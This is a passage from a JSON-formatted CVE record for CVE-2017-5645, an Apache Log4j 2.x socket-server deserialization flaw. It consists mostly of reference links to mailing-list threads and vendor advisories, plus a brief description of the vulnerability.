Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3Cdev.logging.apache.org%3E", }, { name: "[activemq-issues] 20191226 [jira] [Created] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Created] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Commented] (TIKA-3018) log4j 1.2 version 
used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191230 [jira] [Created] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20191230 [jira] [Created] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20200106 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200107 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200108 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200110 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 Re: 
[jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Closed] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Resolved] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200114 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200115 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: 
"https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Resolved] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200127 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200208 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: 
"https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Resolved] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3Cissues.activemq.apache.org%3E", }, { name: "[logging-commits] 20200425 svn commit: r1059809 - /websites/production/logging/content/log4j/2.13.2/security.html", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3Ccommits.logging.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", ], url: 
"https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { name: "[bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E", }, { name: "[activemq-issues] 20200730 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3Cissues.activemq.apache.org%3E", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "[doris-commits] 20210402 [GitHub] [incubator-doris] zh0122 opened a new pull 
request #5594: [FE][Bug]Update log4j-web to fix a security issue", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3Ccommits.doris.apache.org%3E", }, { name: "[beam-issues] 20210528 [jira] [Created] (BEAM-12422) Vendored gRPC 1.36.0 is using a log4j version with security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3Cissues.beam.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik opened a new pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] edited a comment on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: 
"https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] suztomo commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3Cgithub.beam.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2017-5645", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache Log4j", version: { version_data: [ { version_value: "All versions between 2.0-alpha1 and 2.8.1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "Remote Code Execution.", }, ], }, ], }, references: { reference_data: [ { name: "RHSA-2017:2888", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { name: "RHSA-2017:2809", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { name: "97702", refsource: "BID", url: "http://www.securityfocus.com/bid/97702", }, { name: "1041294", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1041294", }, { name: "RHSA-2017:2810", refsource: 
"REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { name: "RHSA-2017:1801", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { name: "RHSA-2017:2889", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { name: "RHSA-2017:2635", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { name: "RHSA-2017:2638", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { name: "RHSA-2017:1417", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { name: "RHSA-2017:2423", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { name: "RHSA-2017:2808", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2808", }, { name: "1040200", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1040200", }, { name: "RHSA-2017:2636", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { name: "RHSA-2017:3399", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { name: "RHSA-2017:2637", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2637", }, { name: "RHSA-2017:3244", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { name: "RHSA-2017:3400", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { name: "RHSA-2017:2633", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { name: "RHSA-2017:2811", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { name: "RHSA-2017:1802", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { name: "RHSA-2019:1545", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", 
refsource: "MLIST", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E", }, { name: "[logging-dev] 20191215 Re: Is there any chance that there will be a security fix for log4j-v1.2.17?", refsource: "MLIST", url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc@%3Cdev.logging.apache.org%3E", }, { name: "[logging-dev] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", refsource: "MLIST", url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125@%3Cdev.logging.apache.org%3E", }, { name: "[oss-security] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", refsource: "MLIST", url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { name: "[announce] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", refsource: "MLIST", url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917@%3Cannounce.apache.org%3E", }, { name: "[logging-dev] 20191219 Re: [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", refsource: "MLIST", url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9@%3Cdev.logging.apache.org%3E", }, { name: "[activemq-issues] 20191226 [jira] [Created] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac@%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Created] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: 
"https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191230 [jira] [Created] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6@%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20191230 [jira] [Created] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c@%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20200106 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200107 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200108 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200110 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 Re: [jira] 
[Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Closed] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Resolved] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200114 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200115 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad@%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7372) [9.8] 
[CVE-2019-17571] [activemq-all] [5.15.10]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Resolved] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200127 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200208 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Resolved] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: 
"https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c@%3Cissues.activemq.apache.org%3E", }, { name: "[logging-commits] 20200425 svn commit: r1059809 - /websites/production/logging/content/log4j/2.13.2/security.html", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d@%3Ccommits.logging.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: 
"https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { name: "https://security.netapp.com/advisory/ntap-20181107-0002/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { name: "https://security.netapp.com/advisory/ntap-20180726-0002/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { name: "https://issues.apache.org/jira/browse/LOG4J2-1863", refsource: "CONFIRM", url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { name: "[bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E", }, { name: "[activemq-issues] 20200730 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: 